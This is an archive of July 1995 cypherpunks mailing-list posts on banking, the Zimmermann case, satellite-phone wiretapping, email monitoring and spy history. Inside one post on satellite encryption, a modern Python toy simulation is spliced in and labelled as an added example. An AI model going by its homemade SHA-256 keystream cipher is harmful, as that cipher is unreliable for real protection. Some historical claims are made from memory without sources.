Date: Sun, 30 Jul 95 20:57:03 PDT
To: cypherpunks@toad.com
Subject: U.S. Banks are not all that bad
Message-ID: <ac419fc0000210046951@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Hate to disagree with Lucky, but....

At 11:05 PM 7/30/95, Lucky Green wrote:
>Six years ago, you could walk into a Bank, show them your driver license,
>and open an  account.
>Today, you need several pieces of ID.

I've cashed checks at Bank of America, Wells Fargo, Comerica (whatever
_that_ is), etc., without having an account at these banks, and without
having to pay any fee, and without any more ID than a driver's license. (I
have no accounts at California banks, so all checks sent to me are,
perforce, not checks drawn at "my" bank...and yet I've never had to pay a
dime to cash a check. The times I've gotten out of state checks, I've of
course not expected third parties to cash them for free for me...usually I
just deposit them by mail.)

>Three years ago, you could withdraw money from your own account without
>having  your checkbook on you.
>Today, they make you pay for a "counter check".

Hasn't happened to me.

>One year ago, you could walk into a bank and cash a check drawn onto an
>account at the very same bank.
>Today (Coast Federal), they make you pay a $10 check cashing fee.

Hasn't happened to me. I walk into banks, present the checks drawn on their
own bank, ask to have it cashed, and all they want is to make sure I'm the
person to whom the check is drawn. No fees, no refusals to cash.

>The US banking industry has gone to the dogs. The day a non-US bank offers
>an account that can be accessed over the net will be the day I close my US
>accounts.

Maybe I have the magic touch.

I find U.S. banks to be marvels of efficiency. (But then I can remember
running out of cash on a Saturday and having no way to get any more cash
except by borrowing from friends...the ATM revolutionized things around
1980.)

I'm not speaking of "interesting" banking applications, which, I fear, are
not permitted by current U.S. banking laws.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sp7yav@kielce.ampr.org
Date: Sun, 30 Jul 95 12:23:57 PDT
To: cypherpunks@toad.com
Subject: punk's not dead!
Message-ID: <8779@kielce.ampr.org>
MIME-Version: 1.0
Content-Type: text/plain


hello? i'm new on this stuff, help me!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sun, 30 Jul 95 21:27:55 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ Interview in Infobahn Magazine
Message-ID: <ac41a60301021004e1e4@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



Lord, I'm going to get in trouble for writing this message...

(And Phil, if you happen to read Cypherpunks now and read this, understand
the context of my comments...)


At 12:57 AM 7/31/95, K. M. Ellis wrote:
>I generally try to avoid buying anything with the word "Infobahn" on it,
>but in the premiere issue of this new magazine there's a 5-page article
>about Phil Zimmermann written by Jeff Elliot (of the National Review...but
>it's a good article anyway ;).  It's pretty good--if anyone is new to the
>ongoing Zimmermann drama it's a good sum-up.

It may be a good article, but as soon as I saw yet another "personality"
interview with PRZ in the new trendzine "Infobahhn," I put the issue back
on the shelf. (Not just because of the PRZ personality piece, but because
I'm ODd (that's "overdosed" to you younger folks) on "Wired," "Mondo 2000,"
"Access," "Ray Gun," "The Net", and all the slightly more technical
magazines like "MIME World," "Java Times," and "Diffie-Hellman Newsletter"
(yes, these last three items are fictitious).)

Just my opinion, but I think the Information Superhypeway is indeed being
over-hyped.

In case you're wondering, I did indeed agree to be photographed for the
cover of "Wired" #2, a few years ago. All I can say is, "I'm sorry."

Bay Aryans can attest to the fact that in the last several months I've
refused to have anything to do with the various hypings and personality
profiles the info rags are so focussed on. I enjoyed talking to Timothy
Leary for a few minutes at a party, but refused to appear on camera with
him in a "Cypherpunks on parade" segment for a Japanese television program.

I'm not condemning those who do interviews--I did a few myself--but I think
there's something to be said for avoiding the "personality profiles" which
so superficially cover the issues.

(At least it's not (yet?) as bad as the media's fascination with Mitnick
and Shimomura....I about barfed to read the tale of "The Hooker and the
Hacker" in the latest "Esquire," the one with Cindy Crawford on the cover.
Then, just today, my younger brother told me he'd been reading about
Mitnick and Shimomura in "Rolling Stone.")

Anyway, flame away with your claims that publicity is good, that the dozens
of PRZ interviews are doing some good.

I'm becoming more of a Zen Buddhist monastic skeptic on these issues every day.


--Tim May, happy to be far from the madding crowd

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 30 Jul 95 21:40:08 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: U.S. Banks are not all that bad
Message-ID: <v02120d01ac4219a2e38e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



As near as I can tell, there are spotty instances of the
behavior Lucky describes, but it is becoming more common,
especially wrt required ID.

I must say that I've had some absolutely amazingly bad experiences
with banks in Asia, Mexico and Central America, so I'm a skeptic
when it comes to assuming that non-US banks are light years better.
Although I have no direct experience of European banking, I do know that
the European banking industry, taken as a whole, is substantially
behind the US banking industry in automation and efficiency. Most of
the irritation that I hear reported about US banks is the result
of pushing customers too hard to change expensive banking habits or
erecting policies that eliminate money-losing practices without regard
to their impact on customer goodwill.

At First Interstate recently, I had to make a withdrawal from
the teller, as the ATM was broken. Their policy _does_
require a "counter check", and normally they charge, but when
I explained that the ATM was kaput they did it for free.
It is _much_ cheaper for them if you use the ATM, and this
kind of policy is designed to encourage you to do this. It's
the kind of thing that the market will sort out nicely --
if it irritates people and loses them money more than it
saves them money, they will stop doing it.

Remember, the US has an absolutely fantastic amount of competition
wrt banking services, especially when compared to other countries.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Sun, 30 Jul 95 19:42:52 PDT
To: cypherpunks@toad.com
Subject: Re: Zimmermann legal fund
In-Reply-To: <199507302305.TAA16631@bb.hks.net>
Message-ID: <Pine.SUN.3.91.950730213249.3889C-100000@bambam>
MIME-Version: 1.0
Content-Type: text/plain


> The US banking industry has gone to the dogs. The day a non-US bank offers
> an account that can be accessed over the net will be the day I close my US
> accounts.

Interesting idea ...

1st question or thing I would want to be certain of is the stability of the
currency of the realm so to speak. I wouldn't want to bank in a country that
had a weak currencey (sp) or was subject to roller coaster economics.  


-Mike

**************************************************************************
*   Personal internet account, opinions and ideas do not reflect those   *
*                         of my employer                                 *
*       Mike Bailey                     (hm)214-252-3915                 * 
*       email bailey@computek.net       (wk)214-456-4510                 *
*                                                                        *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*               http://www.computek.net/public/bailey/                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Sun, 30 Jul 95 22:23:41 PDT
To: Phil Fraering <pgf@tyrell.net>
Subject: Re: Sat phone permit "wire"taps
Message-ID: <199507310521.WAA08390@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>>      "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
>>    features to permit authorized eavesdropping, officials said. 

Sigh...

>> Hmm. Anyone here ever heard of the Walkers, or the Rosenbergs? 

Different cases - the Walkers gave away information on how the Yankees were
stealing Russian secrets, which the Russians patched up by encrypting.
The most current information on the Rosenbergs, gotten from decrypted Soviet
communications and declassified US and ex-Soviet files, indicates that Ethel
Rosenberg was probably innocent of spying, and Julius was spying but didn't give away
any useful atomic secrets, and that the FBI probably knew at the time they
had Ethel killed that she was innocent.  Sometimes even having your secrets
cracked isn't enough to protect you....
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Sun, 30 Jul 95 22:24:12 PDT
To: Alex Tang <altitude@cic.net>
Subject: Re: building libraries
Message-ID: <199507310521.WAA08413@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:40 PM 7/28/95 -0400, Alex Tang wrote:
>> The answer is to have some non-USA entity build shareable full fledged 
>> full powered crypto libraries and provide them for free for the rest of 
>> the world and for all machines.
>Wouldn't there still be licensing issues to deal with (in the states at
>least)??  I'm sure RSA would claim that the package would be in violation
>of the licensing...

If you did everything in an RSAREF-compatible manner, that would help;
I think somebody outside the US has written an RSAREF-clone.
Some problems include building programs that have generic-callout hooks
instead of crypto-specific hooks (so that they don't get bitten by ITAR),
while still maintaining reasonable efficiency and convenience.

#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 30 Jul 95 23:25:54 PDT
To: dmandl@panix.com (David Mandl)
Subject: Re: The little sex kitten
In-Reply-To: <v01530501ac4040bb01c2@[166.84.250.21]>
Message-ID: <199507310618.XAA23903@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> The tightwad, privacy-loathing scumbags I work for sprang just such a
> document on us recently, and after squirming and bitching about it for a
> while, I actually did sign, simply because I wasn't prepared to lose my job
> at that point.  My fear, based on well-established tradition, is that
> eventually this will become widespread and more and more employers will
> monitor email, with coerced "consent."

	I really don't see what the big deal is. That's why you use a
commercial/non-work ISP for personal email, etc.

-- 
sameer						Voice:   510-601-9777
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Sun, 30 Jul 95 20:41:06 PDT
To: cypherpunks@toad.com
Subject: Re: Zimmermann legal fund
Message-ID: <199507310338.XAA00176@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Mike wrote:

<snip>

>Interesting idea ...
>
>1st question or thing I would want to be certain of is the stability of the
>currency of the realm so to speak. I wouldn't want to bank in a country that
>had a weak currencey (sp) or was subject to roller coaster economics.  
>

<snip>

Who knows...An international free market in banking might eventually
lead us back to the evil old gold standard and slowly make the bureaucrats
of the Federal Reserve obsolete. How awful. <grin>
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMBxLLW1lp8bpvW01AQGw8AP/fAWaHgPO064Pv/4JoqcrLDmBBytGR0Tz
MfArYuG7/yogyewbZaRkW/MAk7T4IsfXO3BnCQu8PS2MoaGTpTNE3qd30CP6G0v8
4ljZVUCgA+BW8yXfZVWUm+rsoZ8xXkZvtu6Ug8PKMjLzOoeSm+ET4Oq47SUKqSVC
mHQVFh92asQ=
=L5vT
- -----END PGP SIGNATURE-----
Regards, Jim Ray

"This year or next, for the first time since the end of World War II,
we will spend more for interest payments on the debt than on defense.
Quite a stunning thing."  --  President  Bill Clinton
"I'm sure as hell stunned!"  --  citizen Jim Ray
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
- ------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBxQGioZzwIn1bdtAQFwzQGA1rJZcc07cuvSS9T0ktCECLfZYuPboy3n
u00aBTPNMYTLXNc6V4vtHYAn85QOn7dT
=bQfM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Sun, 30 Jul 95 23:38:36 PDT
To: nsb@nsb.fv.com
Subject: Re: Zimmermann legal fund
Message-ID: <199507310635.XAA25441@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:23 PM 7/30/95 EDT, nsb@nsb.fv.com wrote:
>To pay into non-US accounts, we need to establish banking relationships in
>other venues.  For the most part, we need to do it one country at a time,
>which is awesomely time-consuming .....
>Remember, the requirement is not that you be in the US, but rather that you
>have an account in a US bank.  This is not all that hard for a non-US
>citizen to do **IF** you can show up physically at a US bank.  Thus, if
>there's a US bank that has an office near you, you can walk in and open an
>account to which deposits can be made through the US direct-deposit system,
>and  you're in business with FV.

Aren't there some banks or similar companies that are world-wide,
but have US branches?  I think SwissBankCorp or somebody like that
has an office in San Francisco; would it be possible for you to transfer
money to someone with an account there who's really in, say, Switzerland
or the UK or Hong Kong?
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Sun, 30 Jul 95 21:25:48 PDT
To: MR ELDON B JENKINS <QLDM75A@prodigy.com>
Subject: Re: C'punks at DefCon
In-Reply-To: <013.09272796.QLDM75A@prodigy.com>
Message-ID: <Pine.D-G.3.91.950731001926.21909A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 30 Jul 1995, MR ELDON B JENKINS wrote:

As you may recall from my earlier remarks, I'll be in Vegas for a 
vacation, but am leaving Friday morning.  For anyone who gets there early 
and would like to have a drink and chat with a non-lurking fed, I'll 
stroll through the Tropicana lobby around 7:00 p.m. Thursday, wearing 
some law enforcement icon (probably my "FBI Training Academy" shirt).

I hope the Tropicana has metal detectors ...

EBD

> > Are any of us cpunks having a gathering at Defcon?  (besides the one
> 
> Well, a couple other c'punks have mailed me to determine a time and a
> place.  It looks like everyone wants to meet in the lobby of the
> Tropicana sometime Friday before Hacker Jeopardy.  Nobody has stated
> a concrete time yet so I guess we'll all just wander through the
> lobby every now and then.  Any suggestions on a time?
> 
> Eldon Jenkins
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 00:30:33 PDT
To: cypherpunks@toad.com
Subject: Re: PRZ Interview in Infobahn Magazine
Message-ID: <199507310728.AAA06576@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:32 PM 7/30/95 -0700, Timothy C. May wrote:
>
> I'm going to get in trouble for writing this message...
Heh, heh.

Infobahn also has an article by Sandy Sandfort in it; Sandy had it at
the SF Cpunks meeting, so I assumed I'd be able to find it at the store
(haven't yet; the first issue was 40K copies for nationwide distribution.)

Michael Berch, the publisher, is a reasonable guy, if you like his type.
mcb@postmodern.com (infobahn.com was taken).  He's got some lawyer background
and hacked computers at LLNL for a while.

>Bay Aryans 
Gack.  You will get in trouble  :-)
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Mon, 31 Jul 95 00:42:04 PDT
To: sameer@c2.org (sameer)
Subject: Re: The little sex kitten
Message-ID: <9507310742.AA17010@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>> ...scumbags I work for sprang just such a document on us....
>> I actually did sign....

Did you promise not to use strong crypto?  

My (definitely NOT scumbag etc.) employer has notified all 
email users that email is NOT private.  As far as I know, 
(and I think I WOULD know) management has never examined email 
not addressed to them, but if they felt it was justified, 
I'm sure they would.  After all, it is their computer.....

It's not censorship when you refuse to pay for the podium!
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hoz@univel.telescan.com (rick hoselton)
Date: Mon, 31 Jul 95 00:54:16 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Sat phone permit "wire"taps
Message-ID: <9507310754.AA17446@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



>Different cases - the Walkers gave away information on how the Yankees were
>stealing Russian secrets, which the Russians patched up by encrypting.

Really?  Do you have a reference for this?  I am interested.

>The most current information on the Rosenbergs, gotten from decrypted Soviet
>communications and declassified US and ex-Soviet files, indicates that Ethel
>Rosenberg was probably innocent of spying, and Julius was spying but didn't give away
>any useful atomic secrets, and that the FBI probably knew at the time they
>had Ethel killed that she was innocent.  

WOW!  Had them killed?  They WERE tried and convicted, you know.  Are you 
claiming evidence was manufactured?  I heard David Kahn on CSPAN say that 
at least one message mentions Ethel Rosenberg.  If memory serves, he said 
something like "without going in to whether evidence was sufficient to 
convict, and without going in to whether they should have been executed, 
these transcripts show that they were spying for the Soviets"  
(I'm not sure that's accurate enough for quotation marks, but that's the 
basics of what he said.  I have it on VCR.

Do you have additional information?  I'll agree the FBI hasn't always behaved 
honorably, and maybe they aren't entitled to the benefit of the doubt here.

OTOH, actual, admitted facts to this effect might be a great reply to Mr. Freeh 
when he asks to be allowed to punish us when we make our mail so he can't read 
it.
Rick F. Hoselton  (who doesn't claim to present opinions for others)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 30 Jul 95 15:58:33 PDT
To: cypherpunks@toad.com
Subject: Re: Zimmermann legal fund
Message-ID: <199507302258.AA04135@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald sez:

[..]
: US banks simply do not work well for international transactions.

: The problem is not so much money laundering laws as intolerable
: ignorance, provincialism, and incompetence.

: If you insist that international transactions be mediated through 
: US banks, you are cutting your throat.

: Go look for banks that are truly international.  You will not
: find them in America.

You could try ABN*AMRO of The Netherlands, they have offices
in most European countries, Asia, Middle East and Latin America,
besides that they are the largest foreign bank in the US owning
LaSalle in the Chicago area and European American Bank in the
New York area. Citicorp also claims to have a global presence.

--
Alex de Joode
Fear Uncertainty and Doubt, Inc.				




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 01:58:18 PDT
To: cypherpunks@toad.com
Subject: Re: Sat phone permit "wire"taps
Message-ID: <199507310855.BAA09829@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:34 AM 7/28/95 -0400, John A. Limpert wrote:
>Is there a technical reason why communications through these future
>satellite systems couldn't be encrypted? I thought that all of these
>systems were based on vocoders and digital transmission, just like
>a secure telephone.

There are four encryption issues - end-to-end, uplink, downlink, and
call-control.
End-to-end is generally your problem, but for typical satellite phone
(like a typical cellphone), if it's not built-on, it's a pain to add on;
at best you might get a phone with digital passthrough of some sort,
so you can send raw bits without a modem.  
Uplink and downlink encryption would be real nice, if the carrier provided them;
at best we'll probably see governments mandating access to session keys
(which the satellites could be equipped to provide), with commercial market 
needs forcing some kind of encryption to prevent eavesdropping (especially
on downlinks, of course.)  The limits aren't technical.
Call-control encryption is an interesting question - there'll certainly
have to be authentication, and you probably won't see phone-credit-card numbers
on the downlink, but you probably _will_ see cleartext set-ids on most services.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*
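The four encryption questions raised in the message above (end-to-end, uplink, downlink, call-control) can be modelled as layers on one call frame. The following is an added example, not part of the original post or of any satellite system; the frame layout, the names and the SHA-256 keystream standing in for a real cipher are all assumptions made for illustration.

```python
"""Toy model of the four encryption layers of a satellite call.

The cipher is a SHA-256 counter-mode keystream used as a stand-in so the
example runs on the standard library; it is not a production cipher.
"""
import hashlib
import os

SET_ID = b"SET-ID:constructed-0001"   # constructed handset identifier
VOICE = b"constructed vocoder frame: hello from handset A"


def xor_stream(key, nonce, data):
    """XOR data with a keystream derived from key and nonce (its own inverse)."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + nonce + offset.to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)


def seal(key, data):
    """Encrypt under a fresh random nonce, which is prepended to the output."""
    nonce = os.urandom(12)
    return nonce + xor_stream(key, nonce, data)


def unseal(key, blob):
    return xor_stream(key, blob[:12], blob[12:])


def link_encode(key, set_id, payload, link, hide_set_id):
    """Build the frame sent over one radio hop (uplink or downlink)."""
    header = bytes([len(set_id)]) + set_id       # call-control field
    if not link:
        return header + payload                  # nothing protected on the hop
    if hide_set_id:
        return seal(key, header + payload)       # call control encrypted too
    return header + seal(key, payload)           # cleartext set-id, sealed voice


def link_decode(key, frame, link, hide_set_id):
    """Undo link_encode with the hop's session key."""
    if link and hide_set_id:
        frame = unseal(key, frame)
    n = frame[0]
    set_id, rest = frame[1:1 + n], frame[1 + n:]
    if link and not hide_set_id:
        rest = unseal(key, rest)
    return set_id, rest


def simulate_call(end_to_end, link, hide_set_id):
    """Send one frame A -> satellite -> B and report what each party can read."""
    k_e2e, k_up, k_down = (os.urandom(32) for _ in range(3))
    # End-to-end layer: only the two handsets hold k_e2e.
    payload = seal(k_e2e, VOICE) if end_to_end else VOICE
    uplink = link_encode(k_up, SET_ID, payload, link, hide_set_id)
    # The carrier holds both session keys, as does anyone given access to them.
    set_id, relayed = link_decode(k_up, uplink, link, hide_set_id)
    downlink = link_encode(k_down, set_id, relayed, link, hide_set_id)
    _, received = link_decode(k_down, downlink, link, hide_set_id)
    heard = unseal(k_e2e, received) if end_to_end else received
    views = {
        "uplink_listener": uplink,        # radio eavesdropper, no keys
        "carrier": set_id + relayed,      # after the link layer is removed
        "downlink_listener": downlink,    # radio eavesdropper, no keys
    }
    report = {who: {"set_id": SET_ID in seen, "voice": VOICE in seen}
              for who, seen in views.items()}
    report["delivered"] = heard == VOICE
    return report


if __name__ == "__main__":
    for cfg in [(False, False, False), (False, True, False),
                (True, True, False), (True, True, True)]:
        print(dict(zip(("end_to_end", "link", "hide_set_id"), cfg)))
        print("   ", simulate_call(*cfg))
```

Link encryption alone keeps radio listeners out but leaves the voice readable to whoever holds the session keys; only the end-to-end layer changes what the carrier sees, and the set-id stays visible on the air unless call control is encrypted as well.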





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 01:58:41 PDT
To: cypherpunks@toad.com
Subject: Re: The Net (short movie review)
Message-ID: <199507310856.BAA09839@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:33 AM 7/29/95 -0400, Robert Hettinga wrote:
>At 3:04 AM 7/29/95, Joel McNamara wrote:
>>Don't bother.  Better to wait until it hits the video shelves then have a
>>party and see who can find the most (of many) technical flaws and gaffs.
>>Would be much more entertaining in that context.
>
>Agreed. In television interviews Ms. Bullock talks about how she's "on the
>net all the time" while in further conversation it's clear that all she
>does is hang out in AOL auditoria and chat-rooms, probably with some
>net.flack at her elbow....

So good for her.  I've spent most of the evening chatting on cypherpunks and
cyberia rather than writing code....  Some recent survey found that 60% of
time that average folks spend on the net is communications rather than
information retrieval.

I rather enjoyed the movie, though I did share the experience of being
one of the two or three people in the theater laughing at various technical
gaffes and/or in-jokes.  Obviously, you can't take anything from Hollywood too
seriously technically, but they did look at a few social issues related to
computerisation, such as the isolation, computer addiction, lack of
face-to-face relationships, difficulty in knowing what's real when
everything's on the computer, vulnerability of society to computer problems,
trustability of people who tell you that you can trust their computer
security system for everything - even the government uses it!   So they
didn't look into them too deeply - they're Hollywood.
That's not their job :-)  Also, I like Sandra Bullock, and I think her acting
pulled the movie together more than the script did.
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Mon, 31 Jul 95 02:15:28 PDT
To: hoz@univel.telescan.com (rick hoselton)
Subject: Re: Sat phone permit "wire"taps
Message-ID: <199507310913.CAA02091@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:52 AM 7/31/95 -0700, rick hoselton wrote:
>
>>Different cases - the Walkers gave away information on how the Yankees were
>>stealing Russian secrets, which the Russians patched up by encrypting.
>
>Really?  Do you have a reference for this?  I am interested.
No refs, this is just memory of the news.  There was an undersea cable
north of Siberia somewhere that carried a lot of unencrypted military
traffic, which US Submarines were eavesdropping on.  I think Walker was
the one who leaked it, and they started encrypting.  Refs on the Walkers
should be easy to find in the library; there were a couple of books.
>
>>The most current information on the Rosenbergs, gotten from decrypted Soviet
>>communications and declassified US and ex-Soviet files, indicates that Ethel
>>Rosenberg was probably innocent of spying, and Julius was spying but didn't give away
>>any useful atomic secrets, and that the FBI probably knew at the time they
>>had Ethel killed that she was innocent.  
>
>WOW!  Had them killed?  They WERE tried and convicted, you know. 

Yes, with government-provided evidence, and with the government withholding
inconvenient evidence.  There was a story on KPFA radio in the last week or so
covering an article on the Rosenbergs in some lefty magazine, probably The
Nation, by a couple who have been strong supporters of them for years, and are
now saying that "sorry, friends, it looks like Julius _was_ spying, though not
atomically".
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
# Export PGP three lines a time --> http://dcs.ex.ac.uk/~aba/export/
M0V]N9W)E<W,@<VAA;&P@;6%K92!N;R!L87<@+BXN(&%B<FED9VEN9R!T:&4@
M9G)E961O;2!O9B!S<&5E8V@L(&]R(&]F('1H92!P<F5S<SL-"F]R('1H92!R
M:6=H="!O9B!T:&4@<&5O<&QE('!E86-E86)L>2!T;R!A<W-E;6)L92P@( T*





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bart@netcom.com (Harry Bartholomew)
Date: Mon, 31 Jul 95 02:34:02 PDT
To: cypherpunks@toad.com
Subject: "Codebreakers" on PBS
Message-ID: <199507310932.CAA27798@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



    For the Bay Area, on KQED at 8 p.m. Tuesday. The NOVA show
    "The World War II codebreaking efforts known as Enigma and Purple"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 31 Jul 95 06:50:46 PDT
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199507311350.GAA26013@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

